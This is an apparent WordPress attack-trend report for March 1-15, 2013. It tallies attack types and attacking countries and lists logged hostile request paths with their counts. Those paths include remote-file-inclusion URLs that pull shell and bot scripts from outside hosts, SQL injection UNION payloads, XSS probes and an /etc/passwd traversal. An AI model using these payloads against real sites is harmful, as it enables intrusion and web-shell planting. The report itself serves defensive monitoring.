Attack Trends March 1-15, 2013
Attack Type
Remote File Inclusion
SQLi
WordPress Username Deduction
Directory Traversal/Local File Inclusion
XSS
File Upload Attempt by Non-Admin Detected
Possible XML-RPC Attacks
WordPress Trackback
Potential [PHP] code execution attacks
PHP/CGI Source Code Disclosure/Coded Execution

Times Seen
3867
1985
1119
711
410
361
356
156
28
14

Attacking Countries
United States
Ukraine
Russian Federation
China
Germany
Canada
Romania
France
Sweden
Hong Kong
Switzerland
Netherlands
Japan
Poland
United Kingdom
Czech Republic
Nigeria
Israel
Brazil
Turkey
Taiwan
Europe
Venezuela
Norway
Spain
Korea, Republic of
Italy
Belarus
Luxembourg
Indonesia
Mexico
Australia
Lithuania
Thailand
Kazakhstan
Kenya
Belgium
Denmark
Vietnam
Chile
United Arab Emirates
Malaysia
Madagascar
Singapore
South Africa
Yemen
Anonymous Proxy
India
Iran, Islamic Republic of
Austria
El Salvador
Serbia
Dominican Republic
Lebanon
Moldova, Republic of
Colombia
Estonia
Jamaica
Iraq
Ghana
Guatemala

Times Seen
6737
450
302
281
169
164
112
109
108
77
61
58
38
35
34
29
24
23
22
21
20
19
18
18
17
14
14
11
8
7
6
5
5
5
5
4
4
4
4
3
3
3
3
2
2
2
2
2
2
2
2
1
1
1
1
1
1
1
1
1
1

Attacked Plugins
/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php
/wp-content/plugins/radykal-fancy-gallery/admin/image-upload.php
/wp-content/plugins/vslider/timthumb.php?src=http%3A%2F%2Fradiopro.ro%2F551081_481072245272916_1741626627_n-300x200.jpg&w=600&h=300&zc=1&q=80
/wp-content/plugins/contact-form-7/images/id.flv???
/wp-content/plugins/vslider/timthumb.php?src=http%3A%2F%2Fradiopro.ro%2Fradiopro.jpg&w=600&h=300&zc=1&q=80
/wp-content/plugins/jetpack/m<script type="text/javascript">/* <![CDATA[ */var _gaq = _gaq %7C%7C [];_gaq.push([
/wp-content/plugins/vslider/timthumb.php?src=http%3A%2F%2Fradiopro.ro%2FSLIDER5.jpg&amp;w=600&amp;h=300&amp;zc=1&amp;q=80
/wp-content/plugins/vslider/timthumb.php?src=http%3A%2F%2Fradiopro.ro%2Fslider4.JPG&amp;w=600&amp;h=300&amp;zc=1&amp;q=80
/wp-content/plugins/vslider/timthumb.php?src=http%3A%2F%2Fflickr.com.modajovens.com%2Fsh.php
/wp-content/plugins/podpress/podpress_backend.php
/wp-content/plugins/asset-manager/upload.php
/wp-content/plugins/sniplets/view/sniplets/notice.php?text=<script>alert(43875062308456)</script>
/wp-content/plugins/sniplets/view/sniplets/inset.php?text=<script>alert(43875062308456)</script>
/wp-content/plugins/sniplets/view/admin/submenu.php?url="><script>alert(43875062308456)</script>
/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1'+UNION+ALL+SELECT+1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23-/wp-content/plugins/wp-cumulus/tagcloud.swf?mode=tags&amp;tagcloud=<tags><a+href='javascript:alert(43875062308456)'+style='font-size:+40pt'>Click me</a></tags>
/wp-content/plugins/sniplets/view/sniplets/warning.php?text=<script>alert(43875062308456)</script>
/wp-content/plugins/tune-library/tune-library-ajax.php?letter=-1'+UNION+ALL+SELECT+CONCAT_WS(CHAR(59),version(),current_user(),database()),2-/wp-content/plugins/facebook-opengraph-meta-plugin/all_meta.php?pst_title=1')+UNION+ALL+SELECT+CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- &amp;page=100&amp;rows=1
/wp-content/plugins/foxypress/foxypress-affiliate.php?aff_id="&gt;&lt;script&gt;alert(43875062308456)&lt;/script&gt;
/wp-content/plugins/nextgen-gallery/xml/media-rss.php?mode=<script>alert(43875062308456)</script>
/wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack&lt;script&gt;alert(43875062308456)&lt;/script&gt;
/wp-content/plugins/ajax-category-dropdown/includes/dhat-ajax-cat-dropdown-request.php?admin&amp;category_id="><script>alert%2843875062308456%29</script>
/wp-content/plugins/couponer/print-coupon.php?ID=-1'+UNION+ALL+SELECT+1,version(),database(),current_user(),5,6,7,8,9,10-/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../../../../../etc/passwd
/wp-content/plugins/search-autocomplete/includes/tags.php?term=-1'+UNION+ALL+SELECT+CONCAT_WS(CHAR(44),version(),current_user(),database()),2,3,4-/wp-content/plugins/sniplets/view/admin/pager.php?page="><script>alert(43875062308456)</script>
/wp-content/plugins/oqey-gallery/getimages.php?gal_id=0'+UNION+ALL+SELECT+1,2,3,4,5,6,7,CONCAT_WS(CHAR(95),version(),current_user(),database()),9,10%23
/wp-content/plugins/photoracer/changefrom.php?rid="&gt;&lt;script&gt;alert(43875062308456)&lt;/script&gt;
/wp-content/plugins/photoracer/changeto.php?rid="&gt;&lt;script&gt;alert(43875062308456)&lt;/script&gt;

Times Seen
167
8
5
4
3
3
3
3
3
2
2
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1

Attacked Themes
/wp-content/themes/onepagewebsite/uploads/upload.php
/wp-content/themes/deep-blue/images/upload/&amp;fileext=php
/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php
/wp-content/themes/Avenue/cache/lobo.txt??
/wp-content/themes/folioway/timthumb.php?src=http%3A%2F%2Fpicasa.com.beerdunce.com%2Fbad.php
/wp-content/themes/hulk/scripts/timthumb.php?src=http%3A%2F%2Fpicasa.com.bristel.co.uk%2Fsimple.php
/wp-content/themes/Attack-Scanner-Theme/admin/upload-file.php
/wp-content/themes/hulk/scripts/timthumb.php?src=http%3A%2F%2Fpicasa.com.xenophobiawatch.co.za%2Fsimple.php
/wp-content/themes/hulk/scripts/timthumb.php?src=http%3A%2F%2Fblogger.com.etres60.com.mx%2Fbad.php
/wp-content/themes/blacklabel/framework/timthumb_old.php?src=http://picasa.com.sigem.ci/cok.php
/wp-content/themes/cubed_v1.2/functions/timthumb.php?src=http%3A%2F%2Fflickr.com.howigotoutofdebt.com%2Fbad.php
/wp-content/themes/clockstone/theme/functions/upload.php
/wp-content/themes/folioway/core/thumb.php?src=http%3A%2F%2Fimg.youtube.com.marcomdistributie.ro%2Fbad.php
/wp-content/themes/twentyeleven/wp-admin/'"--></style></script><script>netsparker(0x000A56)</script>
/wp-content/themes/twentyeleven/wp-admin/?nsextt='"--></style></script><script>netsparker(0x000A54)</script>
/wp-content/themes/folioway/core/thumb.php?src=http://wordpress.com.fb.bbdginc.com/jos.php
/wp-content/themes/twentyeleven/wp-admin/?'"--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000A59)&lt;/script&gt;
/wp-content/themes/twentyeleven/wp-admin/?hTTp://netsparker.com/n
/wp-content/themes/twentyeleven/wp-admin/?http://www.netsparker.com?
/wp-content/themes/wp-admin/?http://www.netsparker.com?
/wp-content/themes/wp-admin/?nsextt='"--></style></script><script>netsparker(0x000A13)</script>
/wp-content/themes/wp-admin/'"--></style></script><script>netsparker(0x000A15)</script>
/wp-content/themes/twentyten/style.css
/wp-content/themes/wp-admin/?'"--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000A18)&lt;/script&gt;
/wp-content/themes/wp-admin/?hTTp://netsparker.com/n
/wp-content/themes/koi/themify/img_x.php?src=http://picasa.com.kidsworldprintables.com/result/bat.php
/wp-content/themes/themorningafter/timthumb.php?src=http%3A%2F%2Fwordpress.com.fb.bbdginc.com%2Fjack.php
/wp-content/themes/?src=http%3A%2F%2Fwordpress.com.fb.bbdginc.com%2Fjos.php
/wp-content/themes/'"--></style></script><script>netsparker(0x0006C1)</script>
/wp-content/themes/flashnews/timthumb.php?src=http%3A%2F%2Fflickr.com.coolrentals.ro/tim.php
/wp-content/themes/twentyeleven/js/'"--></style></script><script>netsparker(0x000808)</script>
/wp-content/themes/twentyeleven/js/html5.js'"--></style></script><script>netsparker(0x00080B)</script>
/wp-content/themes/twentyeleven/style.css'"--></style></script><script>netsparker(0x0006C9)</script>
/wp-content/themes/twentyeleven/'"--></style></script><script>netsparker(0x0006C5)</script>
/wp-content/themes/twentyeleven/colors/'"--></style></script><script>netsparker(0x0006EB)</script>
/wp-content/themes/twentyeleven/colors/dark.css'"--></style></script><script>netsparker(0x0006EF)</script>

Times Seen
55
48
10
8
7
6
4
3
3
3
3
2
2
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1

Page 1

Remote File Inclusion
SQLi
WordPress Username Deduction
Directory Traversal/Local File
Inclusion
XSS
File Upload Attempt by NonAdmin Detected
Possible XML-RPC Attacks
WordPress Trackback
Potential [PHP] code execution
attacks
PHP/CGI Source Code Disclosure/Coded Execution

Page 2

Attack Trends March 1-15, 2013
Upload Directoris Searched
/wp-content/uploads/2012/08/FB-RW-Cover2.jpg&amp;w=960&amp;h=300&amp;zc=1
/wp-content/uploads/2010/08/rfihttp://sibkukla.ru/1/bb.jpg???
/wp-content/uploads/2010/08/rfihttp://www.comfaoriente.com//a/ipays.jpg?
/wp-content/uploads/2010/08/dorks.txthttp://www.xfocus.net/tools/200608/r57.txt?
/wp-content/uploads/2010/08/*.php?mosConfig_absolute_path=http://flickr.com.meuviciodesdeoinicio.com.br/bot.txt??
/wp-content/uploads/2012/08/FB-RW-Cover1.jpg&amp;w=960&amp;h=300&amp;zc=1
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://sibkukla.ru/1/bb.jpg???
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.comfaoriente.com//a/ipays.jpg?
/wp-content/uploads/2012/08/Slide-KellyCattle.jpg&amp;w=960&amp;h=400&amp;zc=1
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.travel-orzelbialy.zam.pl/galeria/include/copyright.txt??
/wp-content/uploads/2010/08/bbs_sun/skin/zero_vote/error.php?dir=http://flickr.com.annohelpt.nl/css.php??
/wp-content/uploads/2012/08/Slide-CattleMountain2.jpg&amp;w=960&amp;h=400&amp;zc=1
/wp-content/uploads/2012/08/Slide-FeedingCalf.jpg&amp;w=960&amp;h=400&amp;zc=1
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wushu.org.ge/e107_images/david.txt
/wp-content/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt?
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://picasa.com.radioalasnaciones.com/id.txt?
/wp-content/uploads/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt?
/wp-content/uploads/2012/08/Slide-RopingCalf1.jpg&amp;w=960&amp;h=400&amp;zc=1
/wp-content/uploads/2010/rfihttp://www.comfaoriente.com//a/ipays.jpg?
/wp-content/uploads/2010/08/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt?
/wp-content/uploads/2010/rfihttp://sibkukla.ru/1/bb.jpg???
/wp-content/uploads/2010/08/index.php?go=http://www.travel-orzelbialy.zam.pl/galeria/include/copyright.txt??
/wp-content/uploads/2010/08/index.php?pag=http://www.khzshilat.ir/img/icons/bonze.jpg??
/wp-content/uploads/2010/zipndownload.php?PP_PATH=http://www.psychvisit.com/id1.txt?
/wp-content/uploads/2010/08//components/com_smf/smf.php?mosConfig_absolute_path=http://heritagevirtualairline.net/bonze.jpg??
/wp-content/uploads/2010/08//main.php?page=http://www.travel-orzelbialy.zam.pl/galeria/include/pbot.txt??
/wp-content/uploads/2010/08//modules/vwar/admin/admin.php?vwar_root=http://www.sweet-affiliates.com/no-more-acne//config/bot.txt??
/wp-content/uploads/2012/08/Slide-Branding.jpg&amp;w=960&amp;h=400&amp;zc=1
/wp-content/uploads/2010//orderSuccess.inc.php?glob=1&amp;cart_order_id=1&amp;glob[rootDir]=http://octo.beev.no/e107_public/byroe.jpg??
/wp-content/wp-admin/?http://www.netsparker.com?
/wp-content/uploads/2010/08//accounts/inc/include.php?language=0&amp;lang_settings[0][1]=http://blogger.com.ippi.cl/force2.php?
/wp-content/uploads/2010/08//appserv/main.php?appserv_root=http://blogger.com.ippi.cl/force2.php?
/wp-content/uploads/2010/08//config/config_admin.php?INC=http://87.201.203.154/HTouch/kickstart/images/shawls/bonze.jpg??
/wp-content/uploads/2010/index.php?body=http://www.psychvisit.com/id1.txt?
/wp-content/uploads/2010/08/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dubion.com/english/awmdata/menu/pop.jpg??
/wp-content/uploads/2010/08//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.picasa.com.sanalespri.com/b0t.php??
/wp-content/uploads/2012/'"--></style></script><script>netsparker(0x0006A9)</script>
/wp-content/uploads/2010/08//components/com_smf/smf.php?mosConfig_absolute_path=http://heritagevirtualairline.net/international.txt??
/wp-content/wp-admin/?hTTp://netsparker.com/n
/wp-content/wp-admin/?'"--&gt;&lt;/style&gt;&lt;/script&gt;&lt;script&gt;netsparker(0x000A12)&lt;/script&gt;
/wp-content/uploads/'"--></style></script><script>netsparker(0x0006A5)</script>
/wp-content/wp-admin/'"--></style></script><script>netsparker(0x000A0F)</script>
/wp-content/wp-admin/?nsextt='"--></style></script><script>netsparker(0x000A0D)</script>
/wp-content/uploads/2012/10/'"--></style></script><script>netsparker(0x0006AE)</script>
/wp-content/uploads/2010//index.php?load=http://bmwtours.com/flight/include/id.txt????
/wp-content/uploads/2010//orderSuccess.inc.php?glob=1&amp;cart_order_id=1&amp;glob[rootDir]=http://octo.beev.no/e107_public/allnet.jpg??
/wp-content/uploads/2010//accounts/inc/include.php?language=0&amp;lang_settings[0][1]=http://blogger.com.ippi.cl/force2.php?
/wp-content/uploads/index.php?body=http://www.psychvisit.com/id1.txt?
/wp-content/uploads/2012/11/'"--></style></script><script>netsparker(0x0006B3)</script>
/wp-content/uploads/2010/08//index.php?load=http://professionaldiving.ru/e107_files/public/avatars/data/pic82.jpg??
/wp-content/uploads/2010/08//main.php?page=http://www.wushu.org.ge/e107_images/david.txt
/wp-content/uploads/2010/08//includes/orderSuccess.inc.php?glob=http://bmwtours.com/flight/include/id.txt????
/wp-content/uploads/2010/08/dorks.txt" h=http://troyanos.eshost.es/plugins/system/scan.txt?
/wp-content/uploads/2010/08/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.dubion.com/english/awmdata/menu/rock.jpg??
/wp-content/uploads/2010/08/agendax/addevent.inc.php?agendax_path=http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4?
/wp-content/uploads/2010/08//orderSuccess.inc.php?glob=1&amp;cart_order_id=1&amp;glob[rootDir]=http://octo.beev.no/e107_public/byroe.jpg??
/wp-content/uploads/2010/08//orderSuccess.inc.php?glob=1&amp;cart_order_id=1&amp;glob[rootDir]=http://octo.beev.no/e107_public/allnet.jpg??
/wp-content/uploads/2010/08/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://picasa.com.radioalasnaciones.com/load.txt???
/wp-content/uploads/2010/08//modules/vwar/convert/mvcw_conver.php?step=1&amp;vwar_root=http://www.dubion.com/english/awmdata/menu/mad01.jpg??
/wp-content/uploads/2010/08//modules/vwar/convert/mvcw_conver.php?step=1&amp;vwar_root=http://www.dubion.com/english/awmdata/menu/mad02.jpg??
/wp-content/uploads/2010/08/index.php?pag=http://www.khzshilat.ir/img/common/gov-trac.txt??
/wp-content/uploads/2010/08/index.php?go=http://www.wushu.org.ge/e107_images/david.txt
/wp-content/uploads/2010/08//config/config_admin.php?INC=http://apamagis.com.br/admconta/n.txt??
/wp-content/uploads/2010/08//config/config_admin.php?INC=http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4?
/wp-content/uploads/2010/08//header.php?abspath=http://picasa.com.blackwellbusiness.com//bot.txt??
/wp-content/uploads/2010/08//index.php?load=http://professionaldiving.ru/e107_files/public/avatars/data/foto81.jpg??
/wp-content/uploads/2010/08/dorks.txt=http://www.avidsen.com/2009/danger.txt??
/wp-content/uploads/2010/08/dorks.txt" h=http://www.alub.com.br/concursos/concursos/recursos/cmd.txt?&amp;&amp;r=s&amp;
/wp-content/uploads/2010/08//index.php?load=http://bmwtours.com/flight/include/id.txt????
/wp-content/uploads/2010/08/index.php?body=http://www.psychvisit.com/id1.txt?
/wp-content/uploads/2010/08/impex/ImpExData.php?systempath=http://www.printom.ru/netcat/modules/my_captcha/img/fee4181443c7299d710d3036451418e4?

Page 3

Times Seen
10
6
6
5
5
4
4
4
4
4
3
3
2
2
2
2
2
2
2
2
2
2
2
2
2
2
2
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1